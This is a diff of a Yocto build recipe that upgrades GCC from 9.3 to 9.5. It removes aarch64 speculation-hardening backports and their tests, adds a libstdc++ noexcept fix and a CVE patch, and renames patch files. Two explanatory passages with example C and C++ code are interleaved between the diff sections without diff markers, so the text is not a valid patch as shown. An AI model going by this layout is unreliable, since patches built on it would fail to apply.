-+(define_register_constraint "Ucr"
-+ "aarch64_harden_sls_blr_p () ? STUB_REGS : GENERAL_REGS"
-+ "@internal Registers to be used for an indirect call.
-+ This is usually the general registers, but when we are hardening against
-+ Straight Line Speculation we disallow x16, x17, and x30 so we can use
-+ indirection stubs. These indirection stubs cannot use the above registers
-+ since they will be reached by a BL that may have to go through a linker
-+ veneer.")
-+
- (define_register_constraint "w" "FP_REGS"
- "Floating point and SIMD vector registers.")
-
-diff --git a/gcc/config/aarch64/predicates.md b/gcc/config/aarch64/predicates.md
-index 8e1b78421..4250aecb3 100644
---- a/gcc/config/aarch64/predicates.md
-+++ b/gcc/config/aarch64/predicates.md
-@@ -32,7 +32,8 @@
-
- (define_predicate "aarch64_general_reg"
- (and (match_operand 0 "register_operand")
-- (match_test "REGNO_REG_CLASS (REGNO (op)) == GENERAL_REGS")))
-+ (match_test "REGNO_REG_CLASS (REGNO (op)) == STUB_REGS
-+ || REGNO_REG_CLASS (REGNO (op)) == GENERAL_REGS")))
-
- ;; Return true if OP a (const_int 0) operand.
- (define_predicate "const0_operand"
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
-new file mode 100644
-index 000000000..b1fb754c7
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
-@@ -0,0 +1,40 @@
-+/* { dg-do compile } */
-+/* { dg-additional-options "-mharden-sls=blr -mbranch-protection=bti" } */
-+/*
-+ Ensure that the SLS hardening of BLR leaves no BLR instructions.
-+ Here we also check that there are no BR instructions with anything except an
-+ x16 or x17 register. This is because a `BTI c` instruction can be branched
-+ to using a BLR instruction using any register, but can only be branched to
-+ with a BR using an x16 or x17 register.
-+ */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+ foo *x;
-+ bar *y;
-+ int left;
-+ int right;
-+};
-+
-+/* We test both RTL patterns for a call which returns a value and a call which
-+ does not. */
-+int blr_call_value (struct sls_testclass x)
-+{
-+ int retval = x.x(x.left, x.right);
-+ if (retval % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+int blr_call (struct sls_testclass x)
-+{
-+ x.y(x.left, x.right);
-+ if (x.left % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+/* { dg-final { scan-assembler-not {\tblr\t} } } */
-+/* { dg-final { scan-assembler-not {\tbr\tx(?!16|17)} } } */
-+/* { dg-final { scan-assembler {\tbr\tx(16|17)} } } */
-+
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-new file mode 100644
-index 000000000..88baffffe
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-@@ -0,0 +1,33 @@
-+/* { dg-additional-options "-mharden-sls=blr -save-temps" } */
-+/* Ensure that the SLS hardening of BLR leaves no BLR instructions.
-+ We only test that all BLR instructions have been removed, not that the
-+ resulting code makes sense. */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+ foo *x;
-+ bar *y;
-+ int left;
-+ int right;
-+};
-+
-+/* We test both RTL patterns for a call which returns a value and a call which
-+ does not. */
-+int blr_call_value (struct sls_testclass x)
-+{
-+ int retval = x.x(x.left, x.right);
-+ if (retval % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+int blr_call (struct sls_testclass x)
-+{
-+ x.y(x.left, x.right);
-+ if (x.left % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+/* { dg-final { scan-assembler-not {\tblr\t} } } */
-+/* { dg-final { scan-assembler {\tbr\tx[0-9][0-9]?} } } */
---
-2.25.1
-
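The patch removed above implements the BLR half of the straight-line-speculation mitigation: indirect calls are routed through small per-register stubs so that a speculation barrier can sit behind the final BR without being on the architecturally executed path. A minimal sketch of the kind of source this transformation affects follows; it assumes an AArch64 compiler carrying these patches and the -mharden-sls=blr option, and the __call_indirect_x* stub names are taken from the patch text above rather than from any external documentation.

/* Indirect call through a function pointer.  Without hardening this
   compiles to "blr x<n>"; with -mharden-sls=blr (per the removed patch
   above) the compiler instead emits "bl __call_indirect_x<n>", and the
   stub performs "mov x16, x<n>; br x16" followed by a speculation
   barrier (sb, or dsb sy; isb on older cores).  */
int call_through (int (*fn) (int), int value)
{
  return fn (value);
}

Building such a translation unit with and without the option and diffing the generated assembly is one way to confirm the mitigation is active, which is essentially what the sls-miti-blr*.c tests above automate.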
diff --git a/meta/recipes-devtools/gcc/gcc-9.3.inc b/meta/recipes-devtools/gcc/gcc-9.5.inc
index 4c54ba250a..9bb41bbe24 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3.inc
+++ b/meta/recipes-devtools/gcc/gcc-9.5.inc
@@ -2,13 +2,13 @@ require gcc-common.inc
# Third digit in PV should be incremented after a minor release
-PV = "9.3.0"
+PV = "9.5.0"
# BINV should be incremented to a revision after a minor gcc release
-BINV = "9.3.0"
+BINV = "9.5.0"
-FILESEXTRAPATHS =. "${FILE_DIRNAME}/gcc-9.3:${FILE_DIRNAME}/gcc-9.3/backport:"
+FILESEXTRAPATHS =. "${FILE_DIRNAME}/gcc-9.5:${FILE_DIRNAME}/gcc-9.5/backport:"
DEPENDS =+ "mpfr gmp libmpc zlib flex-native"
NATIVEDEPS = "mpfr-native gmp-native libmpc-native zlib-native flex-native"
@@ -69,15 +69,14 @@ SRC_URI = "\
file://0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch \
file://0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch \
file://0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch \
- file://0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch \
- file://0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch \
- file://0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch \
+ file://0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch \
+ file://CVE-2023-4039.patch \
"
S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}"
-SRC_URI[sha256sum] = "71e197867611f6054aa1119b13a0c0abac12834765fe2d81f35ac57f84f742d1"
+SRC_URI[sha256sum] = "27769f64ef1d4cd5e2be8682c0c93f9887983e6cfd1a927ce5a0a2915a95cf8f"
# For dev release snapshotting
#S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/official-gcc-${RELEASE}"
-#B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
+B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
# Language Overrides
FORTRAN = ""
@@ -122,3 +121,6 @@ EXTRA_OECONF_PATHS = "\
--with-sysroot=/not/exist \
--with-build-sysroot=${STAGING_DIR_TARGET} \
"
+
+# Is a binutils 2.26 issue, not gcc
+CVE_CHECK_WHITELIST += "CVE-2021-37322"
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch b/meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
index 0d9222df17..0d9222df17 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch b/meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch
index f427ee67c1..f427ee67c1 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch b/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch
new file mode 100644
index 0000000000..506064bfc2
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch
@@ -0,0 +1,44 @@
+From 60d966708d7cf105dccf128d2b7a38b0b2580a1a Mon Sep 17 00:00:00 2001
+From: Jonathan Wakely <jwakely@redhat.com>
+Date: Fri, 5 Nov 2021 21:42:20 +0000
+Subject: [PATCH] libstdc++: Fix inconsistent noexcept-specific for valarray
+ begin/end
+
+These declarations should be noexcept after I added it to the
+definitions in <valarray>.
+
+libstdc++-v3/ChangeLog:
+
+ * include/bits/range_access.h (begin(valarray), end(valarray)):
+ Add noexcept.
+
+(cherry picked from commit 2b2d97fc545635a0f6aa9c9ee3b017394bc494bf)
+
+Upstream-Status: Backport [https://github.com/hkaelber/gcc/commit/2b2d97fc545635a0f6aa9c9ee3b017394bc494bf]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+
+---
+ libstdc++-v3/include/bits/range_access.h | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/libstdc++-v3/include/bits/range_access.h b/libstdc++-v3/include/bits/range_access.h
+index 3d99ea92027..4736e75fda1 100644
+--- a/libstdc++-v3/include/bits/range_access.h
++++ b/libstdc++-v3/include/bits/range_access.h
+@@ -101,10 +101,10 @@ _GLIBCXX_BEGIN_NAMESPACE_VERSION
+
+ template<typename _Tp> class valarray;
+ // These overloads must be declared for cbegin and cend to use them.
+- template<typename _Tp> _Tp* begin(valarray<_Tp>&);
+- template<typename _Tp> const _Tp* begin(const valarray<_Tp>&);
+- template<typename _Tp> _Tp* end(valarray<_Tp>&);
+- template<typename _Tp> const _Tp* end(const valarray<_Tp>&);
++ template<typename _Tp> _Tp* begin(valarray<_Tp>&) noexcept;
++ template<typename _Tp> const _Tp* begin(const valarray<_Tp>&) noexcept;
++ template<typename _Tp> _Tp* end(valarray<_Tp>&) noexcept;
++ template<typename _Tp> const _Tp* end(const valarray<_Tp>&) noexcept;
+
+ /**
+ * @brief Return an iterator pointing to the first element of
+--
+2.25.1 \ No newline at end of file
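The backported libstdc++ change above only adjusts declarations so they carry the same noexcept as the definitions in <valarray>; mismatched exception specifications on the same function are ill-formed, so the forward declarations had to follow suit. A small illustration of code that exercises those overloads is sketched below (range-for over a valarray resolves to the free begin()/end() declared in <bits/range_access.h>); it is an example for orientation only, not part of the patch.

#include <valarray>

/* Range-for over a std::valarray uses the free begin()/end() overloads
   whose declarations the patch marks noexcept.  Before the fix the
   declarations and the definitions in <valarray> disagreed on the
   exception specification.  */
int sum (const std::valarray<int> &v)
{
  int total = 0;
  for (int x : v)
    total += x;
  return total;
}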
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch b/meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
index 23ec5bce03..23ec5bce03 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch b/meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch
index 17ec8986c1..17ec8986c1 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch b/meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch
index 3c28aeac63..3c28aeac63 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch b/meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch
index 906f3a7317..906f3a7317 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch b/meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
index 68a876cb95..68a876cb95 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch b/meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch
index 6acd2b0cf9..6acd2b0cf9 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch b/meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch
index 5a9e527606..5a9e527606 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch b/meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch
index a8103b951e..a8103b951e 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch b/meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
index d9d563d0f7..d9d563d0f7 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch b/meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch
index 9d98878096..f0b79ee145 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch
@@ -17,6 +17,10 @@ $(sort list) doesn't need this.
Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
Signed-off-by: Khem Raj <raj.khem@gmail.com>
+RP: gcc then added *.h and *.def additions to this list, breaking the original
+fix. Add the sort to the original gcc code, leaving the tr+sort to fix the original
+issue but include the new files too as reported by Zhuang <qiuguang.zqg@alibaba-inc.com>
+
Upstream-Status: Pending
---
gcc/Makefile.in | 2 +-
@@ -31,7 +35,7 @@ index fef6c4c61e3..57cf7804f0a 100644
# files. All other files are flattened to a single directory.
$(mkinstalldirs) $(DESTDIR)$(plugin_includedir)
- headers=`echo $(PLUGIN_HEADERS) $$(cd $(srcdir); echo *.h *.def) | tr ' ' '\012' | sort -u`; \
-+ headers="$(sort $(PLUGIN_HEADERS) $$(cd $(srcdir); echo *.h *.def))"; \
++ headers=`echo $(sort $(PLUGIN_HEADERS)) $$(cd $(srcdir); echo *.h *.def) | tr ' ' '\012' | sort -u`; \
srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*|]/\\\\&/g'`; \
for file in $$headers; do \
if [ -f $$file ] ; then \
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch b/meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch
index 455858354f..455858354f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch b/meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch
index 2953859238..2953859238 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch b/meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
index d4445244e2..d4445244e2 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch b/meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
index 6f0833ccda..6f0833ccda 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch b/meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
index 96da013bf2..96da013bf2 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch b/meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch
index 2385099c25..2385099c25 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch b/meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch
index e0129d1f96..e0129d1f96 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch b/meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
index 1d2182140f..1d2182140f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch b/meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
index e363c7d445..e363c7d445 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch b/meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
index 846c0de5e8..846c0de5e8 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch b/meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch
index 102d6fc742..102d6fc742 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch b/meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
index 443e0a2ca6..443e0a2ca6 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch b/meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch
index 59ac97eaed..59ac97eaed 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch b/meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
index abfa7516da..abfa7516da 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch b/meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
index ae8acc7f13..ae8acc7f13 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch b/meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
index 52a5d97aef..52a5d97aef 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch b/meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
index bfa7e19dd0..bfa7e19dd0 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch b/meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch
index f8e8c07f62..f8e8c07f62 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch b/meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
index 60a29fc94d..60a29fc94d 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch b/meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
index 6f048dab82..6f048dab82 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch b/meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch
index f080b0596f..f080b0596f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch b/meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
index 3b7ccb3e3d..3b7ccb3e3d 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch b/meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch
index 5e199fbcfd..5e199fbcfd 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch b/meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch
index 825e070aa3..825e070aa3 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch b/meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
index f268a4eb58..f268a4eb58 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch b/meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
index a79fc03d15..a79fc03d15 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch b/meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
index b69114d1e5..b69114d1e5 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
